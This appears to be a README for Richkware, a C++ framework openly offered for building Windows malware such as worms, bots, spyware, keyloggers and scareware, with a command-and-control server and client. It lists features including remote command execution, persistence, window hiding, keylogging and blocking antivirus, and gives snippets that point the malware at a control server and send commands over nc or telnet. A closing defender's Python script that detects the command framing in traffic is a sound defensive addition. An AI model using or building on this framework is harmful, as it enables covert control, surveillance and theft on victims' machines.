Richkware is a framework for building Windows malware, written in C++. It provides a library of network and system functions for creating different types of malware, including viruses, worms, bots, spyware, keyloggers, and scareware.
The Richkware framework includes a set of modules and functions that enable you to create malware with various capabilities. These include network communication, system manipulation, cryptography, and more.
- Virus
- Worms
- Bot
- Spyware
- Keylogger
- Scareware
- Richkware-Manager-Server: A server for managing hosts infected with malware developed using the Richkware framework.
- Richkware-Manager-Client: A client for communicating with the Richkware-Manager-Server, which allows you to send commands to infected hosts.
- Server (network.h): Manages a multi-threaded server that receives commands from the internet (via Richkware-Manager-Client or console) according to a specific protocol.
  - Protocol (protocol.h):
    - Remote command execution (ID 1)
    - (work in progress)
- Network (network.h):
  - RawRequest: Send a request to a server.
  - UploadInfoToRichkwareManagerServer: Upload information to Richkware-Manager-Server.
- Storage (storage.h):
  - SaveSession and LoadSession: Save and load the application state (encrypted), using:
    - Registry (SaveValueReg and LoadValueReg)
    - File (SaveValueToFile and LoadValueFromFile)
  - Persistence: Ensures the application remains active in the system.
- IsAdmin and RequestAdminPrivileges (richkware.h): Check and request administrator privileges.
- StealthWindow (richkware.h): Hide application windows.
- OpenApp (richkware.h): Open arbitrary applications.
- Keylogger (richkware.h): Logs all keystrokes to a file.
- BlockApps and UnBlockApps (blockApps.h): Block and unblock applications (e.g., antivirus programs).
- Encrypt and Decrypt (crypto.h): Uses RC4 (default) or Blowfish encryption algorithms.
- Encode and Decode (crypto.h): Supports Base64 (default) and Hex encoding.
- RandMouse (richkware.h): Randomly moves the mouse cursor.
- Hibernation (richkware.h): Hibernates the system.
To build and use Richkware, you will need:
- Make or CMake
- MinGW
If you have deployed Richkware-Manager-Server (RMS), initialize the malware as follows:
int main() {
    Richkware richkware("Richk", "DefaultPassword", "192.168.99.100", "8080", "associatedUser");
    ...
    return 0;
}
This will retrieve a secure key from RMS and use it for encryption. DefaultPassword is used as a fallback encryption key if the malware cannot reach the RMS.
If you have not deployed RMS, you can use:
Richkware richkware("Richk", "richktest");
This will use richktest as the encryption key.
make
- Go to C/C++ > Preprocessor > Preprocessor Definitions, and add _CRT_SECURE_NO_WARNINGS.
- In Linker > Input > Additional Dependencies, add Ws2_32.lib.
In your main program, start the server by calling its Start function. The following example uses TCP port 8000:
int main() {
    ...
    richkware.network.server.Start("8000");
    ...
}
If you are using Richkware-Manager-Client, you can connect to the server and send commands.
On Unix-based systems, use netcat (nc):
nc <serverName> 8000
If the server is running and accessible, it will respond, and you can send commands like:
[[1]]COMMAND
On Windows, use telnet:
telnet <serverName> 8000
Once connected, send a command like:
[[1]]COMMAND
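For defenders, the `[[ID]]COMMAND` framing shown above can be matched in captured traffic. The following is an added example, not part of Richkware or its README: it flags connections whose first client payload starts with such a frame. It assumes the frame arrives in cleartext at the start of the payload, as in the nc and telnet sessions above; the flow tuples, addresses and the `scan`/`parse_frame` names are constructed for illustration.

```python
import re
from typing import NamedTuple, Optional

# Framing as shown on this page: "[[<id>]]<command>". Only ID 1 is documented.
# Anchored at the start so "[[1]]" inside unrelated text (e.g. a URL) is ignored.
FRAME = re.compile(rb"\A\[\[(\d{1,4})\]\]([^\r\n]*)")
KNOWN_IDS = {1: "remote command execution"}

class Alert(NamedTuple):
    src: str
    dst: str
    dport: int
    command_id: int
    meaning: str
    body: str

def parse_frame(payload: bytes) -> Optional[tuple[int, bytes]]:
    """Return (id, body) if the payload starts with a [[id]] frame, else None."""
    # telnet/nc sessions often begin with stray CR/LF or spaces; skip them.
    m = FRAME.match(payload.lstrip(b"\r\n \t"))
    return (int(m.group(1)), m.group(2)) if m else None

def scan(flows) -> list[Alert]:
    """flows: iterable of (src, dst, dport, first client payload bytes)."""
    alerts = []
    for src, dst, dport, payload in flows:
        frame = parse_frame(payload)
        if frame is None:
            continue
        cid, body = frame
        meaning = KNOWN_IDS.get(cid, "undocumented ID")
        # The body may not be text; escape non-ASCII bytes for the alert.
        alerts.append(Alert(src, dst, dport, cid, meaning,
                            body.decode("ascii", "backslashreplace")))
    return alerts

# Constructed sample flows (documentation addresses, not captured traffic).
SAMPLE_FLOWS = [
    ("198.51.100.7", "192.0.2.10", 8000, b"[[1]]COMMAND\r\n"),
    ("198.51.100.7", "192.0.2.10", 8000, b"\r\n[[7]]\xff\xfe"),
    ("192.0.2.33", "192.0.2.10", 80, b"GET /wiki?q=[[1]] HTTP/1.1\r\n"),
    ("192.0.2.34", "192.0.2.10", 8000, b"[[Main Page]]"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_FLOWS):
        print(alert)
```

The listening port is configurable (the README example uses 8000), so match on the payload framing rather than on the port number.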